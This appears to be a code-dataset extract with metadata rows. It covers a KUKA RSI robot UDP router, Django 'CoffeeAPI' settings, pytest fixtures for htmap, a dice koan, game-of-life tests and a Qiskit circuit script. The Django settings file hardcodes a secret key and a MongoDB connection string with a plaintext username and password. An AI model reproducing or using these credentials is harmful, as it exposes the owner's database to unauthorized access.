# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author: Lars Tingelstad
# Maintainer: Lars Tingelstad <lars.tingelstad@ntnu.no>
import socket
import threading
import time
import numpy as np
import struct
import xml.etree.ElementTree as et
class UDPServerRealTime(threading.Thread):
    """Threaded UDP endpoint that talks to a single remote peer.

    The socket is bound immediately on construction.  A peer is adopted
    either implicitly (first datagram received, when ``handshake`` is
    None) or explicitly via :meth:`connect`, which blocks until a
    datagram whose payload equals ``handshake`` arrives.  Consecutive
    receive timeouts are counted and, once the configured maximum is
    exceeded, the peer is flagged for disconnection.
    """

    def __init__(self, name, host, port, handshake=None):
        """Bind a UDP socket on ``(host, port)``.

        :param name: label used in log messages and as the thread name
        :param host: local interface to bind
        :param port: local UDP port to bind (0 picks a free port)
        :param handshake: expected first payload from a legitimate
            client, or None to accept the first sender unconditionally
        """
        threading.Thread.__init__(self)
        self.daemon = True
        self.name = name
        self._host = host
        self._port = port
        self._handshake = handshake
        self._timeout = None
        self._timeout_count = 0
        self._is_timed_out = False
        self._max_timeout_count = None
        self._lock = threading.Lock()
        self._recv_data = None
        self._send_data = None
        self._remote_addr = None
        self.is_connected = False
        self._stop_flag = threading.Event()
        self._disconnect_client_flag = threading.Event()
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.settimeout(self._timeout)
        self._socket.bind((self._host, self._port))

    def set_max_timeout_count(self, timeout_count):
        """Disconnect the peer after this many consecutive receive timeouts."""
        self._max_timeout_count = timeout_count

    def timeout(self):
        """Return the current receive timeout in seconds (None = blocking)."""
        return self._timeout

    def set_timeout(self, timeout):
        """Set the socket receive timeout (None blocks forever)."""
        self._timeout = timeout
        self._socket.settimeout(self._timeout)

    def receive(self):
        """Receive one datagram; return its payload, or None on timeout.

        When no handshake is configured, the first sender is adopted as
        the connected peer.  A successful receive resets the timeout
        counter; exceeding the configured maximum sets the disconnect
        flag.
        """
        try:
            data, addr = self._socket.recvfrom(1024)
            self._recv_data = data
            # Adopt the sender as our peer when no handshake is used.
            if self._handshake is None and not self.is_connected:
                self._remote_addr = addr
                print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
                self.is_connected = True
            self._timeout_count = 0
            return data
        except socket.timeout:
            # BUG FIX: was "except socket.timeout, e:" -- Python-2-only
            # syntax (SyntaxError on Python 3); the bound name was unused.
            if self._max_timeout_count is not None:
                self._timeout_count += 1
                print("{name}: Late package!".format(name=self.name))
                if self._timeout_count > self._max_timeout_count:
                    print("{name}: Maximum timeouts. Disconnecting client: {addr}".format(name=self.name, addr=self._remote_addr))
                    self._disconnect_client_flag.set()
            return None

    def send(self, data):
        """Send ``data`` to the currently connected peer."""
        self._send_data = data
        self._socket.sendto(self._send_data, self._remote_addr)

    def connect(self):
        ''' Create connection from external client '''
        if self._handshake is not None:
            if not self.is_connected:
                # Block indefinitely while waiting for the handshake.
                self._socket.settimeout(None)
                data, remote_addr = self._socket.recvfrom(1024)
                # NOTE(review): on Python 3 ``data`` is bytes while the
                # handshake may be str ("RSI" in KUKARSIRouter); callers
                # should pass a bytes handshake -- confirm.
                if data == self._handshake:
                    self._remote_addr = remote_addr
                    print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
                    self.is_connected = True
                else:
                    print("{name}: Could not accept connection from: {addr}".format(name=self.name, addr=remote_addr))
                    self._disconnect_client_flag.set()
        else:
            print("{name}: Can not create connection without handshake!".format(name=self.name))
        # Restore the configured timeout after the blocking handshake wait.
        if self._timeout is not None:
            self._socket.settimeout(self._timeout)

    def stop(self):
        """Ask the run() loop to terminate.

        NOTE(review): the loop only re-checks the flag after the next
        disconnect event, so stop() does not take effect immediately.
        """
        print("{name}: Stopping!".format(name=self.name))
        self._stop_flag.set()

    def disconnect(self):
        """Ask the run() loop to drop the current peer."""
        self._disconnect_client_flag.set()

    def run(self):
        """Accept peers and drop them whenever a disconnect is requested."""
        while not self._stop_flag.is_set():
            print("{name}: Waiting for connection!".format(name=self.name))
            if self._handshake is not None:
                self.connect()
            self._disconnect_client_flag.wait()
            print("{name}: Disconnecting client".format(name=self.name))
            self.is_connected = False
            self._remote_addr = None
            self._disconnect_client_flag.clear()
        # BUG FIX: the original called self.join() here, but a thread must
        # not join itself (raises RuntimeError).  Returning ends the thread.
class KUKARSIRouter(object):
    """Bridge between the KUKA RSI real-time interface and an external client.

    Relays the robot's cyclic RSI XML telegrams to an external UDP client
    as packed binary joint-position packets, and returns the client's
    desired joint positions to the robot as axis corrections.
    """

    def __init__(self):
        self._lock = threading.Lock()
        # Axis correction sent back to the robot each RSI cycle.
        self._joint_correction = np.zeros(6).astype(np.float32)
        self._joint_setpoint_position_init = None
        # NOTE(review): the RSI listen address is hard-coded to a specific
        # interface; adjust to the NIC the robot controller talks to.
        self._rsi_server = UDPServerRealTime('rsi server', '192.168.1.67', 49152)
        self._rsi_server.set_max_timeout_count(3)
        self._ext_control_server = UDPServerRealTime('ext control server', 'localhost', 10000, "RSI")
        self._ext_control_server.set_timeout(0.004)
        self._ext_control_server.set_max_timeout_count(3)

    def _parse_xml_from_robot(self, data):
        """Parse one RSI telegram from the robot.

        :returns: (axis_actual_pos, axis_setpoint_pos, n_late_packages, IPOC)
        """
        root = et.fromstring(data)
        # Cartesian actual position (parsed but not returned)
        RIst = root.find('RIst').attrib
        cart_actual_pos = np.array([RIst['X'], RIst['Y'], RIst['Z'],
                                    RIst['A'], RIst['B'], RIst['C']], dtype=np.float64)
        # Cartesian setpoint position (parsed but not returned)
        RSol = root.find('RSol').attrib
        cart_setpoint_pos = np.array([RSol['X'], RSol['Y'], RSol['Z'],
                                      RSol['A'], RSol['B'], RSol['C']], dtype=np.float64)
        # Axis actual position
        AIPos = root.find('AIPos').attrib
        axis_actual_pos = np.array([AIPos['A1'], AIPos['A2'], AIPos['A3'],
                                    AIPos['A4'], AIPos['A5'], AIPos['A6']], dtype=np.float64)
        # Axis setpoint position
        ASPos = root.find('ASPos').attrib
        axis_setpoint_pos = np.array([ASPos['A1'], ASPos['A2'], ASPos['A3'],
                                      ASPos['A4'], ASPos['A5'], ASPos['A6']], dtype=np.float64)
        # Number of late packages reported by the controller
        Delay = root.find('Delay').attrib
        n_late_packages = int(Delay['D'])
        # IPOC timestamp used to pair replies with telegrams
        IPOC = int(root.find('IPOC').text)
        return axis_actual_pos, axis_setpoint_pos, n_late_packages, IPOC

    def _create_xml_to_robot(self, desired_axis_corr, ipoc_cycle_num):
        """Serialize an RSI <Sen> reply carrying axis corrections and the
        echoed IPOC timestamp."""
        dac = desired_axis_corr
        sen = et.Element('Sen', {'Type': 'ImFree'})
        et.SubElement(sen, 'AK', {'A1': str(dac[0]),
                                  'A2': str(dac[1]),
                                  'A3': str(dac[2]),
                                  'A4': str(dac[3]),
                                  'A5': str(dac[4]),
                                  'A6': str(dac[5])})
        et.SubElement(sen, 'IPOC').text = str(ipoc_cycle_num)
        return et.tostring(sen)

    def _create_joint_pos_packet(self, ipoc, axis_actual_pos):
        """Pack (ipoc, 6 joint values) into the binary wire format."""
        return struct.pack('Q6d', ipoc, *axis_actual_pos)

    def _parse_joint_pos_packet(self, packet):
        """Unpack the binary wire format into (ipoc, q_desired)."""
        data = struct.unpack('Q6d', packet)
        ipoc = data[0]
        q_desired = np.array(data[1:], dtype=np.float64)
        return ipoc, q_desired

    def run(self):
        """Run the relay loop (blocks forever)."""
        self._ext_control_server.start()
        self._rsi_server.start()
        while True:
            ## Receive rsi packet from robot. This is a blocking call if no
            ## rsi is connected. The timeout is set to 4ms when the robot
            ## connects, and is reset to None when the robot disconnects.
            data = self._rsi_server.receive()
            if self._rsi_server.is_connected:
                ## Set timeout of receive for RSI client when robot connects
                if self._rsi_server.timeout() is None:
                    self._rsi_server.set_timeout(0.004)
                ## Only parse rsi packet if content is not None
                if data is not None:
                    ## Parse rsi packet xml document
                    q_actual, q_setpoint, late_packages, ipoc = self._parse_xml_from_robot(data)
                    if self._joint_setpoint_position_init is None:
                        self._joint_setpoint_position_init = q_setpoint
                    if self._ext_control_server.is_connected:
                        ipoc_out = ipoc
                        ## Forward the current joint state to the client
                        packet = self._create_joint_pos_packet(ipoc_out, q_actual)
                        self._ext_control_server.send(packet)
                        ## Receive desired joint position packet
                        data = self._ext_control_server.receive()
                        if data is not None:
                            ipoc_in, q_desired = self._parse_joint_pos_packet(data)
                            print(q_desired)
                            ## Accept the correction only when the client
                            ## echoed the IPOC timestamp we just sent.
                            if ipoc_in == ipoc_out:
                                ## Correction = desired position minus the
                                ## robot's current joint setpoint.
                                with self._lock:
                                    self._joint_correction = q_desired - q_setpoint
                    with self._lock:
                        data = self._create_xml_to_robot(self._joint_correction, ipoc)
                    print(data)
                    self._rsi_server.send(data)
            else:
                print("RSI Router: No connection with robot. Disconnecting all external connections!")
                self._joint_setpoint_position_init = None
                self._joint_correction = np.zeros(6).astype(np.float32)
                self._ext_control_server.disconnect()
                self._rsi_server.set_timeout(None)
        self._ext_control_server.stop()
        # BUG FIX: the original read "self._rsi_server.stop;" which only
        # evaluates the bound method and never calls it.
        self._rsi_server.stop()
if __name__ == '__main__':
    # Launch the RSI router when executed as a script (blocks forever).
    KUKARSIRouter().run()
| kuka_driver/src/kuka_driver/kuka_rsi_router.py | 11,935 | !/usr/bin/env python Copyright (c) 2014, Norwegian University of Science and Technology All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
Author: Lars Tingelstad Maintainer: Lars Tingelstad <lars.tingelstad@ntnu.no>self._lock.acquire()self._lock.release() Set connection if handshake mechanism is not usedself._lock.acquire()self._lock.release()print("{name}: Disconnecting!".format(name=self.name))self._rsi_server = UDPServerRealTime('rsi server','localhost', 49152) Cartesian actual position Cartesian setpoint position Axis actual Axis setpoint pos Number of late packages IPOC numberwhile not self._stop_flag.is_set(): Receive rsi packet from robot. This is a blocking call if no rsi is connected. The timeout is set to 4ms when the robot connects, and is reset to None when the robot disconnects. Set timeout of receive for RSI client when robot connects Only parse rsi packet if content is not None Parse rsi packet xml document Create joint position packet to send to external control client Send send joint position packet to external control client Receive desired joint position packet parse data from client check if the received ipoc timestamp is equal to the received ipoc timestamp from the external control client The joint correction is equal to the desired joint position minus the current joint setpoint.self._joint_correction = q_desired - self._joint_setpoint_position_init | 2,804 | en | 0.833432 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Northwestern University.
#
# Invenio-Vocabularies is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Subjects services."""
class SubjectsLabels:
    """Fetching of subjects labels for facets."""

    def __call__(self, ids):
        """Return the facet-label mapping for ``ids``.

        The ids received here are the vocabulary ``scheme`` (top-level)
        and ``subject`` (nested) values.  Since those are already
        human-readable, each unique id simply maps to itself.
        """
        return {identifier: identifier for identifier in set(ids)}
| invenio_vocabularies/contrib/subjects/facets.py | 695 | Fetching of subjects labels for facets.
Return the mapping when evaluated.
In this case, the ids received are actually the vocabulary `scheme`
(top-level) and `subject` (nested). And since they are already
human-readable, we keep them as-is.
Subjects services.
-*- coding: utf-8 -*- Copyright (C) 2021 Northwestern University. Invenio-Vocabularies is free software; you can redistribute it and/or modify it under the terms of the MIT License; see LICENSE file for more details. | 480 | en | 0.899633 |
"""
Django settings for CoffeeAPI project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import urllib
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2z$9iq)q+$an2fm4gj271_*z-r#x86pcc976)^eh@8kuc*#@7h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CoffeeAPI.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CoffeeAPI.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'djongo',
"NAME": 'mongodb+srv://mohammed-mongo:iF7MzKLgXvgL57ve@coffee-api.u2crw.mongodb.net/test?retryWrites=true&w=majority'
}
}
"""
DATABASES = {
"default": {
"ENGINE": "djongo",
"CLIENT": {
"host": "mongodb+srv://mohammed-mongo:iF7MzKLgXvgL57ve@coffee-api.u2crw.mongodb.net/?retryWrites=true&w=majority",
"username": "mohammed-mongo",
"password": "iF7MzKLgXvgL57ve",
"name": "test",
"authMechanism": "SCRAM-SHA-1",
},
}}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| CoffeeAPI/CoffeeAPI/settings.py | 3,586 | Django settings for CoffeeAPI project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
Build paths inside the project like this: os.path.join(BASE_DIR, ...) Quick-start development settings - unsuitable for production See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ SECURITY WARNING: keep the secret key used in production secret! SECURITY WARNING: don't run with debug turned on in production! Application definition Database https://docs.djangoproject.com/en/3.0/ref/settings/databases Password validation https://docs.djangoproject.com/en/3.0/ref/settings/auth-password-validators Internationalization https://docs.djangoproject.com/en/3.0/topics/i18n/ Static files (CSS, JavaScript, Images) https://docs.djangoproject.com/en/3.0/howto/static-files/ | 990 | en | 0.677913 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
    """Instantiate the nym droid memory chip quest-loot tangible."""
    chip = Tangible()
    chip.template = "object/tangible/loot/quest/shared_nym_droid_memory_chip.iff"
    chip.attribute_template_id = -1
    chip.stfName("item_n","nym_memory_chip")
    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####
    return chip
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet:
    """A rollable set of dice whose last roll is exposed via ``values``."""

    def __init__(self):
        self._values = None

    @property
    def values(self):
        """Outcome of the most recent roll, or None before any roll."""
        return self._values

    def roll(self, n):
        """Roll ``n`` six-sided dice and remember the outcome."""
        self._values = [random.randint(1, 6) for _ in range(n)]
class AboutDiceProject(Koan):
    """Koan exercising the DiceSet implementation above."""

    def test_can_create_a_dice_set(self):
        self.assertTrue(DiceSet())

    def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
        dice = DiceSet()
        dice.roll(5)
        self.assertTrue(isinstance(dice.values, list), "should be a list")
        self.assertEqual(5, len(dice.values))
        for value in dice.values:
            self.assertTrue(value >= 1 and value <= 6, "value " +
                            str(value) + " must be between 1 and 6")

    def test_dice_values_do_not_change_unless_explicitly_rolled(self):
        dice = DiceSet()
        dice.roll(5)
        before = dice.values
        after = dice.values
        self.assertEqual(before, after)

    def test_dice_values_should_change_between_rolls(self):
        dice = DiceSet()
        dice.roll(5)
        before = dice.values
        dice.roll(5)
        after = dice.values
        self.assertNotEqual(before, after,
                            "Two rolls should not be equal")
        # THINK ABOUT IT: since rolls are random, two consecutive rolls
        # could in principle be equal.  A better test would roll two
        # independent DiceSet instances and check that each holds values.

    def test_you_can_roll_different_numbers_of_dice(self):
        dice = DiceSet()
        dice.roll(3)
        self.assertEqual(3, len(dice.values))
        dice.roll(1)
        self.assertEqual(1, len(dice.values))
| python3/koans/about_dice_project.py | 2,047 | !/usr/bin/env python -*- coding: utf-8 -*- Needs implementing! Tip: random.randint(min, max) can be used to generate random numbers THINK ABOUT IT: If the rolls are random, then it is possible (although not likely) that two consecutive rolls are equal. What would be a better way to test this? Roll two different instances of DiceSet and check that they both have any value | 374 | en | 0.910246 |
#This file was originally generated by PyScripter's unitest wizard
import unittest
from coord import Coord
from cell import Cell
from field import Field
def dummy():
    """ Dummy function for comparison of the return values """
    return None
class CoordTest(unittest.TestCase):
    """Exercises Coord, Cell and Field from the game-of-life package."""

    def setUp(self):
        # Fresh field for every test.
        self.field = Field()

    def tearDown(self):
        pass

    def testMain(self):
        self.coord = Coord()
        assert self.coord.main() == dummy(), 'Gol01.get_size() does not provide the right return value'

    def testCoordSavesItsCoordinates(self):
        point = Coord(4, 5)
        assert 4 == point.x
        assert 5 == point.y

    def testCreatedCellIsAlive(self):
        cell = Cell(Coord(4, 5))
        assert cell.isAlive() == True, 'cell.status() does not provide the right return value'

    def testCellKnowsIfItLivesInTheNextStep(self):
        cell = Cell(Coord(4, 5))
        cell.nextStep(5)
        assert False == cell.isAlive()

    def addCell(self, x, y):
        # Helper: place a live cell at (x, y) on the test field.
        self.field.add(Cell(Coord(x, y)))

    def fillExampleField(self):
        # Helper: L-shaped trio of live cells.
        for x, y in ((1, 1), (1, 2), (2, 1)):
            self.addCell(x, y)

    def testFieldIsWellCreated(self):
        self.fillExampleField()
        assert self.field.getNumberOfLivingCells() == 3, 'field.numberOfAliveCells does not provide the right return value'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| src/game_of_life/python_coderetreat_socramob/cr_socramob08/coord_test.py | 1,645 | Dummy function for comparison of the return values
This file was originally generated by PyScripter's unitest wizard run all tests raised by sys.exit(True) when tests failed | 175 | en | 0.89528 |
# Copyright 2018 HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from pathlib import Path
from copy import copy
import pytest
import htmap
from htmap.settings import BASE_SETTINGS
from htmap._startup import ensure_htmap_dir_exists
# start with base settings (ignore user settings for tests)
htmap.settings.replace(BASE_SETTINGS)
htmap.settings[
    "DELIVERY_METHOD"
] = "shared"  # shared is the default for all tests that aren't parametric
htmap.settings["WAIT_TIME"] = 0.1
htmap.settings["MAP_OPTIONS.request_memory"] = "10MB"
htmap.settings["MAP_OPTIONS.keep_claim_idle"] = "1"
# Snapshot of the configured settings; reset_settings restores this
# pristine copy before every test.
SETTINGS = copy(htmap.settings)
@pytest.fixture(scope="function", autouse=True)
def reset_settings():
htmap.settings.replace(SETTINGS)
@pytest.fixture(scope="function", autouse=True)
def set_transplant_dir(tmpdir_factory, reset_settings):
path = Path(tmpdir_factory.mktemp("htmap_transplant_dir"))
htmap.settings["TRANSPLANT.DIR"] = path
@pytest.fixture(scope="function")
def delivery_methods(delivery_method, reset_settings):
htmap.settings["DELIVERY_METHOD"] = delivery_method
def pytest_addoption(parser):
    """Register the ``--delivery`` CLI option selecting delivery methods."""
    parser.addoption(
        "--delivery",
        nargs="+",
        # shared is the default for parametric delivery testing
        default=["shared"],
    )
def pytest_generate_tests(metafunc):
    """Parametrize ``delivery_method`` from the ``--delivery`` CLI option."""
    if "delivery_methods" not in metafunc.fixturenames:
        return
    metafunc.parametrize(
        "delivery_method", metafunc.config.getoption("delivery"),
    )
@pytest.fixture(scope="function", autouse=True)
def set_htmap_dir_and_clean(tmpdir_factory):
map_dir = Path(tmpdir_factory.mktemp("htmap_dir"))
htmap.settings["HTMAP_DIR"] = map_dir
ensure_htmap_dir_exists()
yield
htmap.clean(all=True)
@pytest.fixture(scope="session")
def doubler():
def doubler(x):
return 2 * x
return doubler
@pytest.fixture(scope="session")
def mapped_doubler(doubler):
mapper = htmap.mapped(doubler)
return mapper
@pytest.fixture(scope="session")
def power():
def power(x=0, p=2):
return x ** p
return power
@pytest.fixture(scope="session")
def mapped_power(power):
mapper = htmap.mapped(power)
return mapper
@pytest.fixture(scope="session")
def never_returns():
def never(_):
while True:
time.sleep(1)
return never
@pytest.fixture(scope="function")
def map_that_never_finishes(never_returns):
m = htmap.map(never_returns, [None])
yield m
m.remove()
@pytest.fixture(scope="session")
def mapped_exception():
@htmap.mapped
def fail(x):
raise Exception(str(x))
return fail
def exception_msg(exc_info) -> str:
    """Return the message of the exception captured in ``exc_info``."""
    captured = exc_info.value
    return str(captured)
| tests/conftest.py | 3,280 | Copyright 2018 HTCondor Team, Computer Sciences Department, University of Wisconsin-Madison, WI. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. start with base settings (ignore user settings for tests) shared is the default for all tests that aren't parametric shared is the default for parametric delivery testing | 788 | en | 0.858723 |
# qubit number=5
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the phase oracle Z_f for boolean function ``f`` on ``n`` qubits.

    For every ``n``-bit string ``rep`` with ``f(rep) == "1"``: X gates map
    that basis state to |1...1>, a multi-controlled phase of pi flips its
    sign, and the X gates are undone.  Cost grows as O(2**n) gate layers.
    """
    # implement the oracle O_f^\pm
    # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
    # or multi_control_Z_gate (issue #127)
    controls = QuantumRegister(n, "ofc")
    oracle = QuantumCircuit(controls, name="Zf")
    for i in range(2 ** n):
        rep = np.binary_repr(i, n)
        if f(rep) == "1":
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
            # oracle.h(controls[n])
            if n >= 2:
                # pi phase on |1...1> == a multi-controlled Z.
                oracle.mcu1(pi, controls[1:], controls[0])
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Assemble the generated search circuit over ``n`` qubits.

    Layers: an initial Hadamard block plus extra generator-inserted gates,
    one Zf oracle application, an X / multi-controlled-phase / X
    diffusion-style block, a final Hadamard layer, then measurement of
    every qubit.  NOTE(review): ``repeat`` (the textbook iteration count)
    is computed but the loop below runs exactly once -- confirm intended.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.h(input_qubit[0]) # number=3
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.cx(input_qubit[4],input_qubit[0]) # number=30
    prog.h(input_qubit[0]) # number=36
    prog.cz(input_qubit[4],input_qubit[0]) # number=37
    prog.h(input_qubit[0]) # number=38
    prog.z(input_qubit[4]) # number=34
    prog.cx(input_qubit[4],input_qubit[0]) # number=35
    prog.cx(input_qubit[4],input_qubit[0]) # number=32
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)
    # Textbook Grover iteration count; only one round is actually applied.
    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(1):
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.cx(input_qubit[1],input_qubit[2]) # number=39
        prog.h(input_qubit[3]) # number=8
        prog.x(input_qubit[0]) # number=9
        prog.x(input_qubit[1]) # number=10
        prog.cx(input_qubit[0],input_qubit[2]) # number=22
        prog.x(input_qubit[2]) # number=23
        prog.cx(input_qubit[0],input_qubit[2]) # number=24
        prog.cx(input_qubit[0],input_qubit[3]) # number=25
        prog.x(input_qubit[3]) # number=26
        prog.cx(input_qubit[0],input_qubit[3]) # number=27
        prog.y(input_qubit[2]) # number=29
        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])
        prog.x(input_qubit[0]) # number=13
        prog.x(input_qubit[1]) # number=14
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[3]) # number=16
        prog.h(input_qubit[0]) # number=17
        prog.h(input_qubit[1]) # number=18
        prog.h(input_qubit[2]) # number=19
        prog.h(input_qubit[3]) # number=20
    prog.h(input_qubit[0])
    prog.h(input_qubit[1])
    prog.h(input_qubit[2])
    prog.h(input_qubit[3])
    # circuit end
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])
    return prog
if __name__ == '__main__':
    # Oracle marks exactly the all-zeros bitstring.
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5,f)
    # Sample measurement counts from the BasicAer QASM simulator.
    backend = BasicAer.get_backend('qasm_simulator')
    sample_shot =7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    # Transpile against a mocked device to report depth and layout.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)
    # NOTE(review): output path is relative to the working directory.
    writefile = open("../data/startQiskit843.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
